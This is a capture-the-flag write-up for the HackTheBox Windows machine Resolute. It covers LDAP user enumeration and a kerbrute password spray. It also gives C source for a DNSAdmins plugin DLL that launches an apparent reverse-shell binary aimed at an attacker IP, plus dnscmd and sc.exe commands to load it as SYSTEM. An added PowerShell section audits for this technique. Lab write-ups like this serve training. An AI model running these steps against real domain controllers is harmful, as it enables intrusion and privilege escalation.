Resolute @ HackTheBox

Resolute is a 30-point Windows machine on HackTheBox that involves enumerating LDAP, password spraying, and using the DNSAdmins group to register a custom plugin DLL, which allows us to execute code as SYSTEM.

Notes

Windapsearch

windapsearch --dc resolute.htb -m users
windapsearch --dc resolute.htb -m users --full
windapsearch --dc resolute.htb -m users --attrs description
windapsearch --dc resolute.htb -m users --attrs sAMAccountName | grep sAMAccountName | cut -d " " -f2 | tee users.txt

https://github.com/ropnop/windapsearch

Kerbrute

kerbrute passwordspray -d megabank.local --dc resolute.htb users.txt 'Welcome123!'

https://github.com/ropnop/kerbrute

DNSAdmins Exploit

#include "pch.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        WinExec("C:\\programdata\\xc_10.10.14.4_1337.exe", 0);
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

dnscmd resolute /config /serverlevelplugindll c:\programdata\xct.dll
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
sc.exe \\resolute stop dns
sc.exe \\resolute start dns
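
The defender's side of the steps above, as an added example that is not part of the original post: a PowerShell audit, run on the DNS server, that reports whether ServerLevelPluginDll is set, where the DLL lives, and who is in DnsAdmins. It assumes an elevated session and the RSAT ActiveDirectory module; the function name Get-DnsPluginDllFinding is hypothetical.

```powershell
# Added defensive example: audit a DNS server for a registered server-level plugin DLL.
# Assumes an elevated session on the DNS server and the RSAT ActiveDirectory module.
$ParamKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

function Get-DnsPluginDllFinding {
    param([string]$KeyPath = $ParamKey)

    # The value is absent on a default install; treat missing or empty as clean.
    $prop = Get-ItemProperty -Path $KeyPath -Name ServerLevelPluginDll -ErrorAction SilentlyContinue
    $dll  = if ($prop) { [string]$prop.ServerLevelPluginDll } else { '' }
    if ([string]::IsNullOrWhiteSpace($dll)) {
        return [pscustomobject]@{ Configured = $false; Path = $null; Reasons = @() }
    }

    # Any configured plugin deserves review; note what makes this one stand out.
    $reasons = @('ServerLevelPluginDll is set')
    $sys32   = Join-Path $env:SystemRoot 'System32'
    if ($dll.StartsWith('\\')) {
        $reasons += 'DLL is loaded from a UNC path'
    } elseif (-not $dll.StartsWith($sys32, [StringComparison]::OrdinalIgnoreCase)) {
        $reasons += "DLL is outside $sys32"
    }

    # Record hash and signature state so the file can be triaged later.
    $hash = $null; $sig = 'NotChecked'
    if (Test-Path -LiteralPath $dll -PathType Leaf) {
        $hash = (Get-FileHash -LiteralPath $dll -Algorithm SHA256).Hash
        $sig  = (Get-AuthenticodeSignature -FilePath $dll).Status.ToString()
        if ($sig -ne 'Valid') { $reasons += "Authenticode status: $sig" }
    } else {
        $reasons += 'DLL path not readable from this host'
    }

    [pscustomobject]@{ Configured = $true; Path = $dll; SHA256 = $hash; Signature = $sig; Reasons = $reasons }
}

Get-DnsPluginDllFinding | Format-List

# Members of DnsAdmins can register a plugin DLL, so review the group alongside the value.
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object SamAccountName, objectClass, distinguishedName
```

On the configuration shown in this post, the function would report the DLL under c:\programdata as being outside System32.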

Thanks egre55 for creating this fun box!

This post is licensed under CC BY 4.0 by the author.